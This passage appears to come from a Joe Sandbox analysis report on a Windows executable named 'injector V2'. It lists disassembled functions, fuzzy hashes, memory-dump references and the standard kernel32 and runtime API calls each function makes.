                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                    • String ID:
                                                                                    • API String ID: 2744730728-0
                                                                                    • Opcode ID: 671a1a9124d23dac7a19ac55deee75347cd589bbf1990514c53e2e9c5bb3c4ee
                                                                                    • Instruction ID: 6ca29a4b13ff27ffb78271c0f38d993317b6e08df52ac0d90018455851b75c18
                                                                                    • Opcode Fuzzy Hash: 671a1a9124d23dac7a19ac55deee75347cd589bbf1990514c53e2e9c5bb3c4ee
                                                                                    • Instruction Fuzzy Hash: 6B019272604209AFCF159FA1EC25AEF3BA6EF40358F12405BF80196390DB78DD10DB98

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000002,?,004D70B1,004D83A0,004D83A0,?,00000002,D6656D70,004D83A0,00000002), ref: 004D7000
                                                                                    • TerminateProcess.KERNEL32(00000000,?,004D70B1,004D83A0,004D83A0,?,00000002,D6656D70,004D83A0,00000002), ref: 004D7007
                                                                                    • ExitProcess.KERNEL32 ref: 004D7019
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 1981ed2677e7db0ab317275451d1a01f58dc2a3810cd941136a71d8ef7456de2
                                                                                    • Instruction ID: a3ea4d35ecd95d217e39ab45245515ede623123e31168db8e832bcba74fe3ecc
                                                                                    • Opcode Fuzzy Hash: 1981ed2677e7db0ab317275451d1a01f58dc2a3810cd941136a71d8ef7456de2
                                                                                    • Instruction Fuzzy Hash: 6FD09E31004544BFDF112F61EC5D88D3F2AAF44355B054026F9094A2F2DB39DD56DB98

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 112 4da732-4da737 113 4da739-4da751 112->113 114 4da75f-4da768 113->114 115 4da753-4da757 113->115 117 4da77a 114->117 118 4da76a-4da76d 114->118 115->114 116 4da759-4da75d 115->116 119 4da7d4-4da7d8 116->119 122 4da77c-4da789 GetStdHandle 117->122 120 4da76f-4da774 118->120 121 4da776-4da778 118->121 119->113 123 4da7de-4da7e1 119->123 120->122 121->122 124 4da78b-4da78d 122->124 125 4da7b6-4da7c8 122->125 124->125 127 4da78f-4da798 GetFileType 124->127 125->119 126 4da7ca-4da7cd 125->126 126->119 127->125 128 4da79a-4da7a3 127->128 129 4da7ab-4da7ae 128->129 130 4da7a5-4da7a9 128->130 129->119 131 4da7b0-4da7b4 129->131 130->119 131->119
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,004DA621,004EA088,0000000C), ref: 004DA77E
                                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,004DA621,004EA088,0000000C), ref: 004DA790
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandleType
                                                                                    • String ID:
                                                                                    • API String ID: 3000768030-0
                                                                                    • Opcode ID: 21b2aed62b57ba96296e487068517cf2005a5e608b0e6e78c9e9bf2182416459
                                                                                    • Instruction ID: ed4d443cd1b7dd265cf0c5b57e16ae8ef7b08137ec8d822f28e2541748b58dbf
                                                                                    • Opcode Fuzzy Hash: 21b2aed62b57ba96296e487068517cf2005a5e608b0e6e78c9e9bf2182416459
                                                                                    • Instruction Fuzzy Hash: D01187716047518ACB304E3ECCE85237AB5AB56330B34071BD5B6867F2C63CD866D64B

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(004E9D20,0000000C), ref: 004D6E13
                                                                                    • ExitThread.KERNEL32 ref: 004D6E1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastThread
                                                                                    • String ID:
                                                                                    • API String ID: 1611280651-0
                                                                                    • Opcode ID: a037195e0540ee85f69ae97b0377e24561c3174faac9be9245752df92e846000
                                                                                    • Instruction ID: 52ab50aa98e83b8c5304a1fa6b354cf7bd11ada4d0796b4a0779bcd1ab483e05
                                                                                    • Opcode Fuzzy Hash: a037195e0540ee85f69ae97b0377e24561c3174faac9be9245752df92e846000
                                                                                    • Instruction Fuzzy Hash: FAF0AFB0A00209AFDB01AFB1C86AA6E3BB5FF04705F10455FF4019B392CB389D01CB99

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 152 4db0cb-4db0d4 153 4db0d6-4db0e9 RtlFreeHeap 152->153 154 4db103-4db104 152->154 153->154 155 4db0eb-4db102 GetLastError call 4db7a0 call 4db757 153->155 155->154
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,004DBC39,?,00000000,?,?,004DBB55,?,00000007,?,?,004DC16E,?,?), ref: 004DB0E1
                                                                                    • GetLastError.KERNEL32(?,?,004DBC39,?,00000000,?,?,004DBB55,?,00000007,?,?,004DC16E,?,?), ref: 004DB0EC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 485612231-0
                                                                                    • Opcode ID: ce9685d0a3e338dfbe5ec4eecc7b0c67305671c6ad92c2ff65b792a9e3c85fac
                                                                                    • Instruction ID: 79420689a313517a3ba9a5541c2783fe7f8e14420ba5bb02680c89c523f6ae91
                                                                                    • Opcode Fuzzy Hash: ce9685d0a3e338dfbe5ec4eecc7b0c67305671c6ad92c2ff65b792a9e3c85fac
                                                                                    • Instruction Fuzzy Hash: B5E08631204658E7CB212BA1FC5DF593A9DDB44395F010037F50C8A3A2C7388941C7CC

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 237 4da00a-4da01e GetLastError 238 4da03a-4da044 call 4d9bcf 237->238 239 4da020-4da028 call 4d9b90 237->239 246 4da04a-4da052 call 4db807 238->246 247 4da046-4da048 238->247 244 4da02a-4da033 239->244 245 4da035 239->245 248 4da0af-4da0b8 SetLastError 244->248 245->238 252 4da057-4da05d 246->252 247->248 250 4da0bf-4da0c4 call 4d835d 248->250 251 4da0ba-4da0be 248->251 253 4da05f-4da06e call 4d9bcf 252->253 254 4da070-4da07e call 4d9bcf 252->254 261 4da08f-4da095 call 4db0cb 253->261 262 4da097-4da0ac call 4da31c call 4db0cb 254->262 263 4da080-4da08e call 4d9bcf 254->263 270 4da0ae 261->270 262->270 263->261 270->248
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,004D6E25,004E9D20,0000000C), ref: 004DA00E
                                                                                    • SetLastError.KERNEL32(00000000), ref: 004DA0B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1452528299-0
                                                                                    • Opcode ID: 5a1fa0ea56183197e74fe53beb77c86e95445b0676def748b3b46515678bcc37
                                                                                    • Instruction ID: 7290c33d0ccf6cda5fb5a0294f1cc6948ad9696048888675c7ef210d4298f8c5
                                                                                    • Opcode Fuzzy Hash: 5a1fa0ea56183197e74fe53beb77c86e95445b0676def748b3b46515678bcc37
                                                                                    • Instruction Fuzzy Hash: 2611C6313052566EDA233F76ACE6E273688EB417ACB15013BF514863A3EB5C9C15419F

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 273 4d3b60-4d3be5 call 4ce940 call 4d3cc0 call 4d3dc0 call 4d6ce6 281 4d3bea-4d3bf7 273->281 282 4d3bfe-4d3c0c 281->282 283 4d3c55-4d3c6b 282->283 284 4d3c12-4d3c1f 282->284 285 4d3cb5 283->285 287 4d3c25-4d3c32 284->287 288 4d3c84-4d3c95 call 4d441d 284->288 285->282 291 4d3c9a-4d3cb2 call 4d3e30 call 4d4241 287->291 292 4d3c38-4d3c45 287->292 288->291 295 4d3c4b-4d3c50 292->295 296 4d3c70-4d3c7f call 4d3de0 292->296 295->285 296->285
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c06c60602dadca20e58fe81bc79595e07bd0b353f5e5967de34b182165a8697c
                                                                                    • Instruction ID: 10a764a520131626642cc02d46c2862a1e8883b14d779a7146d23b75a791afd4
                                                                                    • Opcode Fuzzy Hash: c06c60602dadca20e58fe81bc79595e07bd0b353f5e5967de34b182165a8697c
                                                                                    • Instruction Fuzzy Hash: E931F5B5D142098BCB04DFA9C5A46AEBBF0FF48705F10846FE456AB340DB399A05CF5A

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 303 4d9e9e-4d9ec8 304 4d9ece-4d9ed0 303->304 305 4d9eca-4d9ecc 303->305 307 4d9ed6-4d9edd call 4d9dd3 304->307 308 4d9ed2-4d9ed4 304->308 306 4d9f1f-4d9f22 305->306 310 4d9ee2-4d9ee6 307->310 308->306 311 4d9ee8-4d9ef6 GetProcAddress 310->311 312 4d9f05-4d9f1c 310->312 311->312 313 4d9ef8-4d9f03 call 4d6ad0 311->313 314 4d9f1e 312->314 313->314 314->306
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e4759255bbca012ab9add8376e473b0f289e0e4bec54bbc49eedeb6cb96201b6
                                                                                    • Instruction ID: c0d7d14088a5eed9faaf28766cfea568270e0ffd92cf0cb0ee45f1715e9442e1
                                                                                    • Opcode Fuzzy Hash: e4759255bbca012ab9add8376e473b0f289e0e4bec54bbc49eedeb6cb96201b6
                                                                                    • Instruction Fuzzy Hash: 7701D6336042566B8B018F69EC90A5777A5FB80324729402BF604DB395EB349C0187DC

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateElliptic
                                                                                    • String ID:
                                                                                    • API String ID: 1611293138-0
                                                                                    • Opcode ID: 2f26992af0bd56fd66c9daa87cb2e3f27d1f7a788689117db12af27e3b783184
                                                                                    • Instruction ID: c899379e066cd258840e4545bfaab615fd747a1d7dae19ca24a4c8c290a41c48
                                                                                    • Opcode Fuzzy Hash: 2f26992af0bd56fd66c9daa87cb2e3f27d1f7a788689117db12af27e3b783184
                                                                                    • Instruction Fuzzy Hash: 0511D6B4D003099BCB04EFA5C49579EBBF1EF48304F40882ED859AB350EB786604CB95

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 326 4db807-4db812 327 4db814-4db81e 326->327 328 4db820-4db826 326->328 327->328 329 4db854-4db85f call 4db757 327->329 330 4db83f-4db850 RtlAllocateHeap 328->330 331 4db828-4db829 328->331 336 4db861-4db863 329->336 332 4db82b-4db832 call 4d8327 330->332 333 4db852 330->333 331->330 332->329 339 4db834-4db83d call 4d7207 332->339 333->336 339->329 339->330
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,?,?,004DA057,00000001,00000364,?,00000005,000000FF,?,004D6E25,004E9D20,0000000C), ref: 004DB848
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 61aaf9b56df72749b8bc04be6959891db02901804169a86d6634665611cbc79a
                                                                                    • Instruction ID: bfd4bf3b06799d80d3374e45f8667f04fa3de4d8ccaca16ffc5ec82056632679
                                                                                    • Opcode Fuzzy Hash: 61aaf9b56df72749b8bc04be6959891db02901804169a86d6634665611cbc79a
                                                                                    • Instruction Fuzzy Hash: EFF0BB31505264D6DB113B228C25B5B378CEF41764B168027FC14D7391DB38DC01D2ED

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 342 4dbc45-4dbc51 343 4dbc83-4dbc8e call 4db757 342->343 344 4dbc53-4dbc55 342->344 351 4dbc90-4dbc92 343->351 346 4dbc6e-4dbc7f RtlAllocateHeap 344->346 347 4dbc57-4dbc58 344->347 348 4dbc5a-4dbc61 call 4d8327 346->348 349 4dbc81 346->349 347->346 348->343 354 4dbc63-4dbc6c call 4d7207 348->354 349->351 354->343 354->346
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004D41E0,?,?,004D1007,?,004CFAB5), ref: 004DBC77
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 1c19ea5119942685644f6191514f3b0b4612f8b59d3ce764efe2db4c3c64659f
                                                                                    • Instruction ID: 4ec0a488111a674f5b721c737df732b9214ccd5682e979e12bbb3b54b9f5e52b
                                                                                    • Opcode Fuzzy Hash: 1c19ea5119942685644f6191514f3b0b4612f8b59d3ce764efe2db4c3c64659f
                                                                                    • Instruction Fuzzy Hash: C3E0E535114651D7EA212622DC29F9F3A48FF81BA4F07012FBC54963E0CF28CC0181ED
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004D4CB6
                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004D4CC4
                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004D4CD5
                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004D4CE6
                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004D4CF7
                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004D4D08
                                                                                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 004D4D19
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 004D4D2A
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 004D4D3B
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004D4D4C
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004D4D5D
                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004D4D6E
                                                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004D4D7F
                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004D4D90
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004D4DA1
                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004D4DB2
                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004D4DC3
                                                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 004D4DD4
                                                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 004D4DE5
                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 004D4DF6
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 004D4E07
                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 004D4E18
                                                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 004D4E29
                                                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 004D4E3A
                                                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 004D4E4B
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004D4E5C
                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 004D4E6D
                                                                                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 004D4E7E
                                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004D4E8F
                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004D4EA0
                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 004D4EB1
                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 004D4EC2
                                                                                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 004D4ED3
                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 004D4EE4
                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 004D4EF5
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 004D4F06
                                                                                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 004D4F17
                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 004D4F28
                                                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 004D4F39
                                                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 004D4F4A
                                                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 004D4F5B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule
                                                                                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                    • API String ID: 667068680-295688737
                                                                                    • Opcode ID: 9e48169d32f0793e880ee4a777dc8b1453f3e533cecebb8bb738eaa9b28bb6b2
                                                                                    • Instruction ID: 192574652617c92f49ef8a7c5c4538bb6cc259aff928a5a689bb0f197af20edd
                                                                                    • Opcode Fuzzy Hash: 9e48169d32f0793e880ee4a777dc8b1453f3e533cecebb8bb738eaa9b28bb6b2
                                                                                    • Instruction Fuzzy Hash: DE613F71D963D0ABC7406FF5BDCD9C63BA8BB197527110437B101DA2E2DBB864428B6C
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004CCF90
                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 004CD216
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
